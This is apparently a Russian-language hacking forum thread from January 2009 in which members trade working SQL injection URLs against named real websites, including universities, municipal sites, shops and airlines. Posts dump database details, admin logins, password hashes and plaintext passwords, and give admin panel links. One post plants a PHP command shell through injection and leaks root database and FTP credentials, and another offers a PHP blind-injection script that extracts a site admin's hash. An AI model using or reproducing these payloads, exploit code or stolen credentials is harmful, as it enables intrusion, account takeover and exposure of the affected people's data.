version(): 4.0.27-icd1-log
database(): imagesfestival
тИЦ: 20
PR: 5
Ambro and Associates Mortgage Consultants
http://www.aamc.ca/about.php?id=-10+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8--
user(): ambro@pearlcrescent.com
version(): 5.0.67-log
database(): ambro
PR: 2
http://cbr.med.harvard.edu/page.php?branch=newsroom&page=releases&type=9&year=2004&id=61%20union%20all%20select%201,2,3,4,5,6,7--
version: 4.1.22-log
user: www@server1.cbrinstitute.org
Database: cbr
http://kofein.kiev.ua/?menu=12&info=3&did=-1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())--
5.0.67-community-log:kofein_admin@localhost:kofein_forum2
spherics
10.01.2009, 19:43
http://www.moto.ru/news/motonews.php?id=-3917+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database())--
тИЦ = 1100
Version:4.1.22-standard-log
User:aprilia_aprilia@localhost
Database:aprilia_aprilia
..::TROYAN::..
10.01.2009, 19:48
http://www.mad-love.ru/blogs.php?user=-1+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6,7,8,9--
madlove1_user@localhost:5.0.32-Debian_7etch5-log:madlove1_db
PR:2
ТиЦ:80
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,table_name+from+inf ormation_schema.tables+limit+0,1--
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,login+from+users+li mit+0,1--
таблицу с паролями ненашол=/
spherics помойму этой иньекции уже нет. А как кстати такие хэши расшифровываються?
AkyHa_MaTaTa
10.01.2009, 20:01
А как кстати такие хэши расшифровываються?
не расшифровываються а брутяться, password pro - тип хеша Mysql5
таблицу с паролями ненашол=/
работая лимитом получаем:
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,table_name+from+inf ormation_schema.tables+limit+64,1--
вот:
http://www.mad-love.ru/blogs.php?user=-1+union+select+1,2,3,4,5,6,7,8,concat(login,0x3a,p sw,0x3a,email)+from+users+limit+1,1--
не расшифровываються а брутяться, password pro - тип хеша Mysql5
а мог бы уточнить название а то много разных прог находиться?
AkyHa_MaTaTa
10.01.2009, 20:34
а мог бы уточнить название а то много разных прог находиться?
http://www.insidepro.com/rus/passwordspro.shtml
а * там не случайно?
spherics теперь такой интересный вопрос, а где на winamp.com вход в админку? ))
http://www.winamp.com/user/login
там нужно вводить эмэил а мне известны лишь ники, значит где ни будь в другом месте
http://www.moto.ru/news/motonews.php?id=-3917+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database())--
тИЦ = 1100
Version:4.1.22-standard-log
User:aprilia_aprilia@localhost
Database:aprilia_aprilia
как тут можно было определит что есть скуля?
З.Ы. ссори за оффтоп
zifanchuck
11.01.2009, 00:43
http://www.moto.ru/news/motonews.php?id=3917
равно
http://www.moto.ru/news/motonews.php?id=3918-1
а занчит может біть скуль))
zifanchuck
11.01.2009, 02:04
а и еще один момент!
Скуль может быть при условии что:
http://www.moto.ru/news/motonews.php?id=3917
равно
http://www.moto.ru/news/motonews.php?id=3918-1
неравно
http://www.moto.ru/news/motonews.php?id=9999
http://www.moto.ru/news/motonews.php?id=3917+or+1=1
http://www.moto.ru/news/motonews.php?id=3917+or+1=2
и поехали))
spherics
11.01.2009, 10:06
http://www.interstar.ua/mobile/catalog/?main_menu=3&id_phone=-1875+union+select+concat_ws(0x3a3a,version(),user( ),database()),2--&count=1
тИЦ = 850
PageRank = 5
Version:5.0.26-Max-log
User:webadmin@localhost
Database:IStarmobile
spherics
11.01.2009, 10:49
http://www.equipnet.ru/equip_cat.php?cat_id=-209+union+select+concat_ws(0x3a3a,version(),user() ,database())--
тИЦ = 3000
PageRank = 5
Version:5.0.75-log
User:equipnet_data@localhost
Database:equipnet_data
Заказчик пропал сволочь =)
Кидаю в паблик.
www.genialpix.net
Залил шелл через скулю.
http://genialpix.net/index.php?categoria=&id=-1619+union+select+1,2,3,4,5,6,0x3c3f2073797374656d 28245f4745545b27636d64275d293b203f3e,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+from+mysql.user+into+ou tfile+'/var/www/html/tmp/c.php'/*
Рут от бд.
define("DB_NAME_I", "swaptables");
define("DB_HOST_I", "localhost");
define("DB_USERNAME_I", "root");
define("DB_PASSWORD_I", "zawajiko");
Данные от фтп:
FTP_HOST 84.253.182.210
FTP_USERNAME webdev
FTP_PASSWORD micaqene
Шопы, мерчи, etc...
__________________________________________________ ______________________
http://www.bethelhebrew.org/news/bulletin_show.php?id=13%20UNION%20SELECT%201,2,3,c onvert(concat_ws(0x3A3a,user_login,user_pass)+usin g+latin1),5%20from%20msgs_users/*
admin::4b631f451436e97276e01d5eb10d411e
__________________________________________________ ______________________
http://www.bellyart.com.au/productDetail.php?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3A3a,table_schema,table_name),16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+informati on_schema.tables/*
__________________________________________________ ______________________
http://www.familyrelatives.com/information/info_detail.php?id=-96'+union+select+1,version(),3,4/*
admin::e00cf25ad42683b3df678c61f42c6bda::admin1
http://www.familyrelatives.com/admin/ -админка
__________________________________________________ ______________________
http://food.truelife.com/after_work/board.php?id=-3+union+select+1,2,3,4,concat_ws(0x3A3a,ID,USER,PA SS),6,7,8,9,10,11+from+admin/*
root::*210BDAB70126948BA5C27B2C9AD3068C1BD814C8
twsiteman::*87FAB66E43DD1EC6C4966796F9FEAFFA809545 32
Админка
http://food.truelife.com/admin
Логи и пасс
1::admin:: DGTfoodworld
__________________________________________________ ______________________
https://ghdrugs.com/product.php?cat_id=-1+union+select+1,concat(name,0x3a,pass,0x3a,email) ,3,4,5,6,7,8,9,10,11,12,13,14+from+webshop_admins/*
https://ghdrugs.com/admin админка
cody01:132722ce61ad9c643a3f4a94783c31dd:BicskA43
kacsa:97854a8e4ba36ef8c9ea711ebed54d6c:firgering
Продолжение следует =)
wildshaman
11.01.2009, 13:30
http://www.toumaz.com/public/news.php?id=999+UNION+SELECT+1,2,3,concat_ws(0x3a3 a,version(),user(),database()),5,6+--
standard::toumaz_extrastuf@evoked.evokedset.net::t oumaz
=========================
http://www.welsh-premier.com/news.php?ID=99999+UNIOn+SELECT+1,concat_ws(0x3a3a, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2,13+--
4.1.19::welshprem@localhost::welshprem
=========================
http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0--
смотрим в титл (спасибо R1dex'у)
4.1.22::eguide@localhost::eguide
"Выставка деловой авиации"
http://2006.jetexpo.ru/?act=jet&next=-3+union+select+1,2,3,version(),5,6,7,8,9,null,11--
5.0.67-log
__________________________________________________ ____
"Туристическая фирма АЗАРТ"
http://www.hazart.ru/index.php?id=-43+union+select+1,2,3,4,5,version()--
5.0.67-log
__________________________________________________ ____
"IndexBox – это маркетинговые исследования, анализ и обзоры рынков"
http://index-box.ru/news/?news_id=-57+union+select+1,2,concat(login,0x3a,password),4, 5,6,7,8,9,10,11,12+from+indexbox_users--
quake : 8fb1a40e1f09124c07763cd75f664c5c : rfrnec
http://index-box.ru/admin/
wildshaman
11.01.2009, 16:55
http://www.logsec.com/news_record.php?news_id=-82+union+select+1,2,3,concat_ws(0x3a3a,version(),u ser(),database()),5+--
4.1.22::logsec-www@localhost::logsec
============
http://www.raconline.org/news/news_details.php?news_id=-10204+union+select+1,2,concat_ws(0x3a3a,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53+--
5.0.51a::w_rac@localhost::rac
ПР 7!
Структура:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
bordercontact
bordercontactstate
bordercontacttopic
borderdata
bordertopic
bordertopicdoc
bordertopicjournal
bordertopicorg
bordertopicrelated
bordertopicsuccess
bordertopictool
cam_test
contactexpert
contacts
data
deltacontact
deltacontactstate
deltatopic
deltatopicdoc
deltatopicjournal
deltatopicorg
deltatopicsuccess
deltatopictool
docpubtopic
docs
docsubject
events
experts
filetest
funding
fundingbordertopic
fundingdeltatopic
fundinggranttopic
glossary
granttopic
igdoc
igevent
igfunding
igglossary
igjournal
igmap
ignews
igorg
igtool
infoguides
infoguidesee
journalpubtopic
journals
julie
list
listTEST
listserv
maps
newig
news
newstopic
organizations
orggroup
newig
news
newstopic
organizations
orggroup
orgorggroup
promotions
pubtopics
relationships
requestors
rhinaddress
rhinagency
rhinbureau
rhindept
rhinlist
rhinlistparticipants
rhinorg
rhinpeople
rhinupdate
searchlog
see
statedoc
statefunding
statejournal
statemap
statenews
stateorg
states
stateterr
statetool
stopwords
subjects
success
successgranttopic
successstate
survey_aug2006
survey_june2003
survey_may2004
survey_may2007
survey_nov2004
survey_sept2005
territories
test
toolorggroup
toolpubtopic
tools
topic
trackuser
webuse
webwatch
===============================
http://www.roamsecure.net/pressitem.php?news_id=-189+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,vers ion(),user(),database()),8,9,10+FROM+INFORMATION_S CHEMA.TABLES+--
5.0.45::wsusr@localhost::roamsecure
Структурко:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
contentsofsite
contentsofsitedev
customers
customersdev
employment
employmentdev
employmentold
industrylinks
jobs
links
nav
navitem
news
newsdev
ourteam
partners
presskit
resources
Assembler
11.01.2009, 19:59
http://www.alpisport.cz/index.php?desk_contain=offer/news/news_action.php&desk_height=857&nws_id=-174%20union%20select%201,2,3,4,concat(username,0x3 a,password,0x3a,check_password,0x3a,company,0x3a,f irstname,0x3a,surname,0x3a,city,0x3a,email,0x3a,ad ministrator),6,7,8,9,10,11,12,13,14,15,16,17,18,19 %20from%20users--
Вылезает целая куча пользователей с мыльниками адресами телефонами и т.д. Пароли без шифровки. Вход на главной страничке =)
prescott
11.01.2009, 20:05
Google PR: 5/10
Yandex CY: 3600
http://www.lipetsk.ru/view.php?id=-762+union+select+1,2,3,4,5,6,group_concat(table_na me),8,9,1,2,3,4,5+from+information_schema.tables+w here+table_schema!=%27information_schema%27--+
Несколько сайтов походу на одной MySQL базе, в том числе база пользователей местного провайдера =)
wildshaman
11.01.2009, 20:42
https://www.scottiescoffee.net/store/productdetail.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a3a,version (),user(),database()),7,8,9,10,11,12+--
5.0.67-community::scotties_kirby@localhost::scotties_coff ee
===============================
http://www.keenanwinery.com/productdetail.php?id=-81+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+--
4.1.22-standard::kwine@localhost::ssl_keenanwinery_com_-_wine
===============================
http://www.sargodhatrackplant.com/productDetail.php?ID=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,10,11+--
5.0.51a-community::stpadmin@localhost::stpdata
===============================
http://www.gpssource.com/productdetail.php?id=-146+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27+--
4.0.27::root@localhost::gpsdb
===============================
http://www.gulfphotoplus.com/gppnew/ProductDetail.php?ID=-455+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 +--
5.0.22::gulfpp@localhost::gulfbcom_uks15467gpp1
===============================
http://www.arrowvalves.co.uk/productdetail.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13+--
4.0.27-standard-log::dbo157947898@212.227.127.61::db157947898
===============================
http://www.splitreason.com/productdetail.php?id=-329+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,ve rsion(),user(),database()),9,10,11,12,13,14,15+--
5.0.67-log::split_w@localhost::split_splitreason
===============================
http://www.alabamacylinderhead.com/productdetail.php?id=-109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,concat_ws(0x3a3a,version(),user(),d atabase()),21,22,23,24,25,26+--
5.0.32-Debian_7etch8-log::acheinc@localhost::alcylinder
===============================
хух, на сегоднея все. Кто что интересное там раскопайте - отпишитесь в ПМ плиз )
Assembler
11.01.2009, 21:08
Кому не лень покрутите +)
http://www.pa-digital.com.pa/admin_pa/preview.php?id=-%2020096+union+select+%201,2/*
http://bagrat.ru/index.php?page_id=-1%20union%20select%201,2,3,4,concat(version(),0x3a ,database()),6%20--
http://wow.glgilde.de/gildenseite/index.php?site=news_comments&newsID=-1%20union%20select%201,2,version(),4,5,6--
http://www.favex.fi/index.php?id=9&news_action=view&news_id=-5+union%20select%201,2,table_name,4,5,6,7%20from%2 0information_schema.tables%20limit%2020,1%20--
http://yeshua.grrbrr.ca/news_action.phtml?article_id=-2 union select 1,2,3,4,5,6,7,8,9--
http://www.hensel-haustechnik.de/index.php?&news_action=show&news_id=-
http://www.dakom.cg.yu/_eng/index.php?detaljnije&id=2%20union%20select%201,2%20--
prescott
11.01.2009, 21:14
http://www.dafont.com/ PR7
Уязвим куки параметр dfcolorid, перебором достаем хэш любого юзера. Сделал сплоит:
<?php
error_reporting(E_ALL);
set_time_limit(0);
for ($j=1; $j<50; $j++) {
for ($i=1; $i<255; $i++) {
$ch=curl_init();
$ua = 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Widows NT)';
curl_setopt($ch, CURLOPT_URL, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_REFERER, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=79302419265e6a9cff6b242ced6723fa; dfu2=221554|c2fe885b93fc3ce0dc1eada368172049; dfcolorid=364822*if(ASCII(SUBSTRING((select password from user where username=0x61646D696E), $j, 1))=$i,2,1)");
$answer=curl_exec($ch);
curl_close($ch);
echo $i."=";
$color=substr($answer,strpos($answer,'name="nbg1"')+33,6);
if ($color=='66FF99') {echo "<br>Найден: ".$i; break;}
}
if ($i>=254) break;
}
?>
Не оптимизирован конечно но пох, за час достает хэш =)
Admin
4d5542b0965999f5aad0fcad908d6d09
Кому не лень покрутите +)
http://www.pa-digital.com.pa/admin_pa/preview.php?id=-%2020096+union+select+%201,2/*
http://bagrat.ru/index.php?page_id=-1%20union%20select%201,2,3,4,concat(version(),0x3a ,database()),6%20--
http://wow.glgilde.de/gildenseite/index.php?site=news_comments&newsID=-1%20union%20select%201,2,version(),4,5,6--
http://www.favex.fi/index.php?id=9&news_action=view&news_id=-5+union%20select%201,2,table_name,4,5,6,7%20from%2 0information_schema.tables%20limit%2020,1%20--
http://yeshua.grrbrr.ca/news_action.phtml?article_id=-2 union select 1,2,3,4,5,6,7,8,9--
http://www.hensel-haustechnik.de/index.php?&news_action=show&news_id=-
http://www.dakom.cg.yu/_eng/index.php?detaljnije&id=2%20union%20select%201,2%20--
нераскрученные inj, то что ты выложил половина не робит, больше такое сюда не кидай
посмотрите понять не могу чего за уязвимость http://dasha.com.ua/wellness_descr.php?page=i3%27
ILYAtirtir
12.01.2009, 04:59
это не скуля и уязвимости тут вроде как нет,ковычки итд экранируются и расширение не отбросить
spherics
12.01.2009, 05:11
http://walaber.com/index.php?action=showitem&id=-19+union+select+1,2,3,4,concat_ws(0x3a3a,version() ,user(),database()),6,7,8,9,10,11,12--
Version:5.0.45-log
User:walaber@cgi1403.int.bizland.net
Database:walaber_db
http://www.carbodydesign.com/video/?id=999992220+union+select+1,2,3,4,5,6,7,8,9,conca t_ws(0x3a3a,version(),user(),database()),11,12,13, 14,15,16,17,18,19,20,21--
Version:5.0.24a-log
User:u70469981@cgihost
Database:d60425765
Наконец то первая скуль которую сам нашёл и роскрутил!!!
Всем огромное за это спасибо!
http://www.yalta.org.ua/pages/firm.php?id=-1772%20union%20select%201,version(),3,4,user(),dat abase(),7,8,9,10,11,12,13,14,15
version : 5.0.51a-15
user : u_admin_yalta@localhost
database: admin_yalta
http://www.yalta.org.ua/pages/firm.php?id=-1772%20union%20select%201,nick,3,4,password,6,7,8, 9,10,11,12,13,14,15%20%20FROM%20user_data%20%20LIM IT%201,1
login:TopAdmin
password:878960
админка http://www.yalta.org.ua/admin/
тока когда ввожу данные, не заходит..не подскажите чё?
муниципальный сайт города Алуштаhttp://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%20version(),2,user(),database( ),5,6,7,8,9,10,11,12%20--
version: 5.0.67-log
user: u7048@10.10.153.177
database: u7048
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%20TABLE_NAME,2,3,4,5,6,7,8,9,1 0,11,12%20%20FROM%20INFORMATION_SCHEMA.TABLES%20--
имена таблиц
тока есть трабла, при запросе любой таблицы, типа
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12%2 0%20FROM%20dn05_users%20--
выдаёт ошибку Table 'u7048.dn05_users' doesn't exist
чё за бред, подскажите
Табла лежит в другой бд.
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15+union+select+concat_ws(0x3a,table_schema,table_ rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12+FROM+INF ORMATION_SCHEMA.TABLES--
К тому же, табла dn05_users - пустая.
Зато есть таблица 4images_users..
Табла лежит в другой бд.
http://www.alushta.crimea.ua/rest/obj/type_obj.php?o=-15+union+select+concat_ws(0x3a,table_schema,table_ rows,TABLE_NAMe),2,3,4,5,6,7,8,9,10,11,12+FROM+INF ORMATION_SCHEMA.TABLES--
К тому же, табла dn05_users - пустая.
Зато есть таблица 4images_users..
нашёл, спасибо за инфу....помогло в двух скулях
history.arizona.edu
http://history.arizona.edu/events/story.php?id=-197+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat (user(),0x2f,version(),0x2f,database()),14,15,16,1 7,18,19,20,21,22,23/*
user() - history@localhost
database() - history
version() - 4.0.12
www.coastal.edu
http://www.coastal.edu/news/story.php?id=1212+union+select+1,password,3,4,5,6, 7,8,9,10,11+from+mysql.user/*
www.housing.wisc.edu
http://www.housing.wisc.edu/resnet/news/story.php?id=-74+union+select+1,2,3,4,5,password,7,8,9,10+from+m ysql.user/*
http://www.ecominfo.spb.ru/news/index.php?id=-1186+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,version(),15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35--
version()=5.0.24a
дальше не смог раскрутить может кто попробует раскрутить
http://www.natpress.net/stat.php?id=-3329+union+select+1,2,3,4,5,concat(login,char(58), pass),7,8,9,10+from+user--
админку не нашел
admin:9605e8702d88
ILYAtirtir
13.01.2009, 04:31
Бажные сайты от iTex:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,version(),databa se(),user()),2,3,4,5/*
5.0.41-log:regiontools:regiontools@cub.mplik.ru
наугад подобрал таблицу админа:
http://www.regiontools.ru/index.php?page=products&pid=100585&item=-11646+union+select+concat_ws(0x3a,login,password), 2,3,4,5+from+rt_admin/*
admin:5583413443164b56500def9a533c7c70:159753
админка http://www.regiontools.ru/admin.php
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+version()/*&id=-100009+union+select+user()/*
5.0.41-log
avantage1@cub.mplik.ru
узнаём название таблицы админа:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
avg_admin
достаём логин и пасс админа:
http://www.avantage1.ru/cgi/main.php?main=main&top=-100002+union+select+111/*&id=-100009+union+select+concat_ws(0x3a,login,password) +from+avg_admin/*
admin:6a4a680519c8eb06
админка http://www.avantage1.ru/cgi/admin.php
Так же на сайте присутствует форум phpbb,но походу права обрезаны т.к. при запросе на phpbb_users выдаёт ошибку.
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,user(),database ())/*
nevgroup@cub.mplik.ru:nevgroup
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+table_name+from+information_sc hema.tables+limit+17,1/*
uralmpg_admin
http://www.nevgroup.ru/index.php?page=about&id=-100005+union+select+concat_ws(0x3a,name,password)+ from+uralmpg_admin/*
admin : 5d2e19393cc5ef67 : password
админка http://www.nevgroup.ru/admin.php
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,user(),databa se(),version()),4/*
ogn66@cub.mplik.ru : ogn66 : 5.0.41-log
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,table_name,4+from+informatio n_schema.tables/*
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
fire_admin
fire_cat
fire_cat_group
fire_cat_item
fire_contacts
fire_contactshort
fire_files
fire_hackers
fire_main
fire_meta
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,login,passwor d),4+from+fire_admin/*
ogn:3d8b2df05dd09579b699a9de68c0d4c0
админка http://www.ogn66.ru/admin.php
Ещё заинтересовала очень таблица fire_hackers :)
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,column_name,4+from+informati on_schema.columns+where+table_name=0x666972655F686 1636B657273/*
т.к. кавычка экранируется то fire_hackers в hex
id
ip
faultscount
blockedtill
http://www.ogn66.ru/index.php?page=products&pid=-9999+union+select+1,2,concat_ws(0x3a,id,ip,faultsc ount,blockedtill),4+from+fire_hackers/*
1:172.22.1.40:5:2006-11-22 16:15:22
2:194.226.147.230:4:2006-11-22 16:15:22
3:212.23.76.23:4:2006-11-22 16:15:22
4:194.226.152.113:4:2006-11-22 16:15:22
6:62.33.99.50:1
7:87.224.234.89:1
8:195.189.109.34:1
хммм... :)
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,user(),vers ion(),database()),4/*&rand=474
koltsovo@localhost:5.0.27:koltsovo
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,table_name,4+from+informat ion_schema.tables+limit+16,1/*&rand=474
kol_admin
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,name,passwo rd),4+from+kol_admin/*&rand=474
admin:*CF7FD12395BFB4CEF6EB0B7D4470B621D3F46BE9
vava:*424193A86C662F47463BC77A44B09CB77DDF5870
law:*831CEF9DA73F4BD8E83873E244FF0806EFA90497
orb:*B0F917485699B8B8453A9D41BD2731E69D9D0026
snow:*619C257D7D5EF71F843A7F8F593C1D33C0F1E9EE
forum:*3E64FE741BF14A31A4ED2B58A75A93EB16D809ED
cargo:*B77FC59BEB345D39A5E263E140E50AEB03F05873:ca rgaison
Так же заинтересовала очень табличка ua_paroles
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,column_name,4+from+informa tion_schema.columns+where+table_name=0x75615F70617 26F6C6573/*&rand=474#
id
name
class
content
http://test.koltsovo.ru/oldsite/about.php?id=-100038+union+select+1,2,concat_ws(0x3a,id,name,cla ss,content),4+from+ua_paroles+limit+0,1/*&rand=474#
и через limit выводим:
1:vava: password:vo44
3:vava:admin:1
41:uralairline3: password:Sa13na
10:vava:ip:*.*.*.*
12:vava:ip:62.117.33.118
8:vava:ip:62.177.33.118
38:uralairline2: password:lO0ka2
13:skip: password:antiskip
14:skip:ip:*.*.*.*
20:zephyr: password:gene5ys
19:vava:ak:у6,u6,svr,сжр
21:zephyr:ip:*.*.*.*
22:zephyr:ak:ют,p2,piv,
39:uralairline2:ip:*.*.*.*
26:zephyr:admin:1
27:utair: password:uta1R
28:utair:ip:*.*.*.*
29:utair:ak:ют,p2,piv
40:uralairline2:ak:у6,u6,svr,сжр
30:skip:ak:у6,u6,svr,сжр
32:uralairlines: password:urAlA1rl1ne5
33:uralairlines:ip:*.*.*.*
34:uralairlines:ak:у6,u6,svr,сжр
42:uralairline3:ip:*.*.*.*
43:uralairline3:ak:у6,u6,svr,сжр
44:uralairline4: password:hO04
45:uralairline4:ip:*.*.*.*
46:uralairline4:ak:у6,u6,svr,сжр
47:uralairline5: password:xAv13r
48:uralairline5:ip:*.*.*.*
49:uralairline5:ak:у6,u6,svr,сжр
50:zozo:admin:1
51:zozo: password:z0z0
52:zozo:ip:*.*.*.*
53:zozo:ak:*
Так и не врубился от чего всё это =\
на мой взгляд очень интересная inj
при запросе
http://otium.ru/artists/?id=13'
выдаёт Ошибка! Не могу выполнить SQL запрос
работая order by добиваемся того, чтобы это сообщение пропало
http://otium.ru/artists/?id=-13+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5--
user(): otium_ru@localhost
version(): 5.1.29-rc
database(): otium_ru
тИЦ: 50
PR: 4
spherics
13.01.2009, 15:45
Магазинчики
http://www.royallifestyle.in/category.php?id=31+union+select+1,concat_ws(0x3a3a ,version(),user(),database()),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32--&cid=23
5.0.51a-community
royal_royalife@localhost
royal_royalife
http://www.royallifestyle.in/category.php?id=31+UNION+SELECT+1,CONCAT(0x7873716 C696E6A626567696E,(SELECT+CONCAT(id,0x7873716C696E 6A64656C,username,0x7873716C696E6A64656C,password) +FROM+royal_royalife.tb_admin),0x7873716C696E6A656 E64),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32--&cid=23
admin
123
http://www.positivehands.co.uk/products/category/Baby-Products/0/1291+union+select+1,2,concat_ws(0x3a3a,version(),u ser(),database()),4,5,6,7,8,9,10,11,12,13,14,15--.html
Database Version: 4.1.22-standard
Database name: mohi4421_positivenew
User name: mohi4421_kalexik@localhost
И снова крым. Сайт города Симферополь
http://www.simferopol.org/modules/mydownloads/ratefile.php?lid=-24%20%20UNION%20SELECT%20concat_ws(0x3a3a,version( ),user(),database())
version: 4.0.27-max-log
user:dbo95496483@74.208.16.2
database:db95496483
Iceangel_
13.01.2009, 16:27
еду...
http://organelledb.lsi.umich.edu/gene.php?id=-210148+union+select+1,version(),3,4,5,6,7,8,9--
magic_quotes=off
5.0.22-log
spherics
13.01.2009, 16:28
http://maricopa.edu/news/?story=-511+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E6 4),0x71),0x71),4,5--
тИЦ = 550
PageRank = 7
Database Version: 5.0.18-log
Database name: news
User name: news@sysweb1a.dist.maricopa.edu
Там в общем несколько баз и сайтов
Сильно расскапывать не стал кому надо продолжит.
http://www.mcli.dist.maricopa.edu/ocotillo/retreat05/gps_session.php?id=31+UNION+SELECT+1,AES_DECRYPT(A ES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Versi on(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x787 3716C696E6A656E64),0x71),0x71),3--
тИЦ = 210
PageRank = 6
Database Version: 5.0.18-log
Database name: ocotillo
User name: mcliweb@www.mcli.dist.maricopa.edu
spherics
13.01.2009, 17:11
http://www.geniv.com/ako888/search_lyric2.php?id=-55+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7--
5.0.51a-log
genivcom_geniv@boscgi1403.eigbox.net
genivcom_geniv
http://www.dhammaweb.net/monk/view.php?id=9831+union+select+1,2,3,4,5,6,concat_w s(0x3a3a,version(),user(),database()),8,9,10,11,12 ,13,14,15,16--
4.0.27-max-log
sayadaw@64.202.166.236
sayadaw
http://www.spartapewter.com/product-profile.php?ID=31+union+select+1,2,3,4,5,concat_ws (0x3a3a,version(),user(),database()),7,8,9,10--&IID=2&MID=5&CID=62
4.1.22-log
sparta_user@localhost
sparta_data
RuSoft.net
http://www.rusoft.net/download.php?id=-804%20UNION%20SELECT%201,2,3,concat_ws(0x3a,versio n(),database(),user()),5,6,7,8,9,10,11,12%20--
version:5.0.22
user:rusoft@localhost
database:rusoft
spherics
13.01.2009, 20:50
SAN DIEGO STATE UNIVERSITY
http://larc.sdsu.edu/langmash/mashuplist.php?id=5678944+union+select+1,2,concat_ ws(0x3a3a,version(),user(),database()),4,5--
